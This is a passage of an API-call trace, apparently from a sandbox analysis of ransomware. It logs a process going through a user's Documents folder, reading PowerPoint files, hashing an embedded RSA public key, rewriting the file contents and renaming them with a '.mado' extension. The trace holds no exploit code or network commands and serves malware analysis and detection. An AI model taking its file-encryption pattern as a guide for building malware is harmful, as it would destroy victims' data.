"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\6cwjr4agnrfxcpy.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\6CwJR4agNRfXCpY.ppt.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\6cwjr4agnrfxcpy.ppt.mado")) returned 1 [0205.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.112] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.113] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5e5a70, ftCreationTime.dwHighDateTime=0x1d5db09, ftLastAccessTime.dwLowDateTime=0x19eb3cc0, ftLastAccessTime.dwHighDateTime=0x1d5da0b, ftLastWriteTime.dwLowDateTime=0x19eb3cc0, ftLastWriteTime.dwHighDateTime=0x1d5da0b, nFileSizeHigh=0x0, nFileSizeLow=0x1650c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BlHpbVqh74ps7nRmbd.pptx", cAlternateFileName="BLHPBV~1.PPT")) returned 1 [0205.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\BlHpbVqh74ps7nRmbd.pptx") returned=".pptx" [0205.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\BlHpbVqh74ps7nRmbd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\blhpbvqh74ps7nrmbd.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.115] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=91404) returned 1 [0205.115] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.117] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x164e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.117] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.120] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.120] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1650c, lpOverlapped=0x0) returned 1 [0205.120] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.121] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.122] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.122] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.122] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.122] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.122] GetLastError () returned 0x0 [0205.122] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.122] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.122] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.122] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.122] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16510) returned 0x3b81690 [0205.122] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81308 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe658 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81350 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe670 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6a0 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6e8 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6b8 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.123] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6a0 | out: hHeap=0x2c0000) returned 1 [0205.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6b8 | out: hHeap=0x2c0000) returned 1 [0205.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6e8 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe6b8 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe6a0 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6ec98 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6edb0 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6b8 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6a0 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.124] GetCurrentThreadId () returned 0x600 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68738 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.124] GetCurrentThreadId () returned 0x600 [0205.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6e8 [0205.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6a0 [0205.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6b8 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe688 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe700 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6d0 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6a0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6a0 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6ec98 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6eec8 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6a0 | out: hHeap=0x2c0000) returned 1 [0205.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6d0 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe700 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6b8 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe688 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe670 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81350 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.128] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x16507, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x16507, lpOverlapped=0x0) returned 1 [0205.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.129] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1650c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.129] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 